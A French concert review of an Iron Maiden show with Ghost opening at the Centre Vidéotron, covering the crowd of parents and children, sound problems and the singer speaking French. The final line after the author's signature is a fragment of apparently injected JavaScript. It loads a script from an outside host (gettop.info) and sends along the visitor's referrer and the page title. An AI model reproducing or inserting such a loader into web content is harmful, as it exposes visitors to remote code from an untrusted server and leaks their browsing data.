Dimanche soir fut une soirée de découvertes et de nostalgies pour tout le monde qui se sont déplacées en nombre pour pouvoir voir ou revoir Iron Maiden. J’ai eu la chance de voir et parler avec plusieurs gens dans la foule avant le spectacle et j’ai été agréablement surpris de voir beaucoup de papas amener leurs enfants à leur premier spectacle d’Iron Maiden et de voir leurs sourires tout au long de la soirée.

Une belle relève se prépare pour les groupes de musiques avec ces jeunes fans. Ghost nous a parti le bal avec une prestation exemplaire et sans faute. Un set énergique et qui a su embarquer rapidement la foule qui était jusqu’à présent silencieuse. Je ne sais vraiment pas comment les musiciens font pour jouer et donner un spectacle de ce genre tout en étant costumés de la sorte. Je leur lève mon chapeau. Une première partie qui a conquis plusieurs nouveaux fans j’en suis sûr. À l’entracte, je me suis promené pas mal et j’ai jasé a plusieurs fans et j’ai été surpris du nombre de fois que chacun avait pu voir Iron Maiden en show. Si je fais une moyenne, le chiffre serait 12 fois ! C’est énorme, mais pour vrai croyable, car partout où Iron Maiden passe, le succès est garanti. En voilà une preuve parmi beaucoup. Décor, mascotte et animation furent au rendez-vous. Jusqu’à présent, le son était vraiment bon. Et pour vrai, ce n’était pas mon premier show au Centre Vidéotron et c’était la première fois que le son était a son meilleur.

Jusqu’à tant que Bruce commence à chanter. À chaque fois qu’il montait une note, le micro coupait et repartait. Mais il n’avait pas l’air de s’en rendre compte honnêtement, car ça ne l’affectait pas du tout. Un point positif, j’ai jamais vu une foule crier et chanter autant pour un set list aussi jeune et avec le moins possible de leur grand succès. Quand on voit ce genre de phénomène, on peut dire que peu importe ce que le groupe va jouer, la soirée va être réussie. Un beau cadeau aussi fut que Bruce parla a la foule en français tout au long de la soirée. À chaque fois qu’il s’exprimait ainsi, la foule s’arrachait les poumons. Et il a terminé la soirée en soulignant que le groupe allait revenir en ville bientôt pour un autre spectacle et qui sait, peut-être encore avec de nouveaux morceaux ou un nouvel album. Je finit cette critique sur cette bonne note, car malheureusement, je suis un fan fini d’Iron Maiden et je pourrais passer la soirée a continué à écrire encore sur le sujet et de vous parler en détail de chaque moment loufoque qui me suis arrivé. Merci encore s tous de me lire et continuer a introduire vos enfants dans l’univers du rock. Ça me fait toujours un plaisir de voir le sourire sur leurs visages.

texte:  Gabriel Drolet Pollock

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;